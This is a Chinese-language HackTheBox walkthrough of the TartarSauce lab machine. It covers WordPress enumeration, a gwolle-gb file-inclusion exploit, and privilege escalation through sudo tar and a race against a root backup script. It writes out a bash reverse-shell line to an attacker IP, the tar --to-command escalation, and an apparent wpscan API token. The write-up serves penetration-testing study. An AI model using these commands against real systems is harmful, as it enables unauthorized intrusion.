**
HackTheBox-Linux-TartarSauce-Walkthrough
**
靶机地址:https://www.hackthebox.eu/home/machines/profile/138
靶机难度:中级(4.7/10)
靶机发布日期:2018年10月28日
靶机描述:
TartarSauce is a fairly challenging box that highlights the importance of a broad remote enumeration instead of focusing on obvious but potentially less fruitful attack vectors. It features a quite realistic privilege escalation requiring abuses of the tar command. Attention to detail when reviewing tool output is beneficial when attempting this machine.
作者:大余
时间:2020-06-10
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机的IP是10.10.10.88…
nmap扫描发现80端口上Apache存在几个子目录…
访问apache一瓶汽水…
经过直接对nmap发现的目录进行各种枚举…发现了/wp子目录…
访问后发现这是wordpress框架页面…404报错…遭到了破坏?上篇文章也遇到了,直接添加域名到hosts即可正常显示…
命令:wpscan --url http://10.10.10.88/webservices/wp --enumerate p --api-token kJ4bhZCgveCcoGJPER7AOsHJTeFDf90Wfj9zu0V6asc
wordpress直接利用wpscan进行渗透…可以看到开始是没有API…前往wpscan官网免费注册一天可以扫50次,获得API直接利用在继续…
发现gwolle-gb中存在远程文件包含漏洞…
查看EXP…下载下来…
阅读后利用EXP方法即可文件上传提权…
简单shell通过EXP上传访问,即可获得反向外壳…成功获得了www低权用户…
这里利用了gwolle漏洞提权…
命令:
echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.14.51/7777 0>&1' > dayu.sh
tar -cvf dayu.tar dayu.sh
权限很低,无法进入用户目录…
枚举发现sudo -l中以tar用户身份运行onuma可以提升到用户权限…
命令:sudo -u onuma tar -xvf dayu.tar --to-command /bin/bash
成功提升权限,获得了user_flag信息…
这里通过LinEnum枚举目前未发现可利用地方…
上传pspy监控进程看看…
发现每五分钟/usr/sbin/backuperer会自动以root权限执行…
查看backuperer内容得出:
1、会从/var/tmp和/var/tmp/check文件夹中删除带点文件?
2、会将/var/www/html用户onuma的内容压缩/存档到文件/var/tmp中,文件的名称以点名开头?
3、带点文件存在30秒。
4、会创建/var/tmp/check目录。
5、将先前解压的内容作为根提取到/var/tmp/check目录中。
6、diff对/var/www/htmlvs 进行对抗/var/tmp/check/var/www/html
目录中的文件会以root权限执行…
那这样可以抓住30秒时间,每到五分钟归零新一轮开始时开始计算30秒时间,当归零时会生成一个带点文件,30秒后会自动删除,期间如果是tar,会自动解压到check目录下…
只需要利用30秒时间插入个简单shell复制到带点文件,带点文件30秒后会自动解压shell到check目录下,就可以以root权限执行了,获得反弹外壳…开始
首先在本地按照backuperer脚本提示,还原方法创建了shell.tar文本…
将其上传到靶机/var/tmp目录下…
利用systemctl list-timers查看backuperer进程的运行时间…
等待LEFT倒计时归零时,ls -la在tmp目录下查看到带点的文件,cp刚上传的shell.tar到带点文件即可…
过10秒左右,脚本会自动解压到check目录,如果未生成check说明失败…检查前面操作…
在check下,查看到了shell具有root执行权限…
执行后获得了root权限,查看到了root_flag信息…
这台就不总结了,思路很好…加油
由于我们已经成功得到root权限查看user和root.txt,因此完成这台中级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。